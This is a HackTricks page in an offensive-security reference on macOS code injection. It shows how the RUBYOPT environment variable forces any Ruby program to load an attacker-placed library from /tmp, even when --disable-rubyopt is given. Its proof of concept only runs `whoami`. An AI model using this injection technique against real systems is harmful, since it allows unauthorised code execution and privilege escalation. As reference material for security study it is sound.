hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md
2024-12-12 11:39:29 +01:00

3 KiB

macOS Ruby Applications Injection

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

RUBYOPT

Using this env variable it's possible to add new params to ruby whenever it gets executed. Although the param -e cannot be used to specify ruby code to execute, it's possible to use the params -I and -r to add a new folder to the libraries to load path and then specify a library to load.

Create the library inject.rb in /tmp:

{% code title="inject.rb" %}

puts `whoami`

{% endcode %}

Create anywahere a ruby script like:

{% code title="hello.rb" %}

puts 'Hello, World!'

{% endcode %}

Then make an arbitrary ruby script load it with:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

Fun fact, it works even with param --disable-rubyopt:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}